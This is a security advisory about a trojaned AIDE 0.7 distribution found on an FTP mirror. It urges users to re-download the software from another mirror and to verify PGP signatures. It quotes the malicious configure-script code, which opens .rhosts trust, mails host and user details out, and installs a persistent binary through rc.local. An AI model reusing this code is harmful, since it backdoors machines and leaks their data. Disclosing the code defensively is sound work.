It has come my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide The offending binary has been removed. Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide. The trojaned distribution contains the following script embedded in the configure script. As you can see it tries to add "+ +" to roots .rhosts and sends information about your host to [EMAIL PROTECTED] # checking if we are root or not if [ `whoami` == "root" ];then root_user=1 else root_user=0 fi And later on: if [ $root_user != "1" ];then echo "+ +" > ~/.rhosts echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig > >/tmp/jea mail [EMAIL PROTECTED] < /tmp/jea rm -rf /tmp/jea else if [ `uname -s` != Linux ];then echo "" else mv -f .xinitrc /bin/lpr echo "# printing status monitor" >> /etc/rc.d/rc.local echo "/bin/lpr &" >> /etc/rc.d/rc.local hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea mail [EMAIL PROTECTED] < /tmp/jea /bin/lpr & rm -rf /tmp/jea fi fi Rami Lehti -- AIDE - Advanced Intrusion Detection Environment Check http://www.cs.tut.fi/~rammer/aide.html
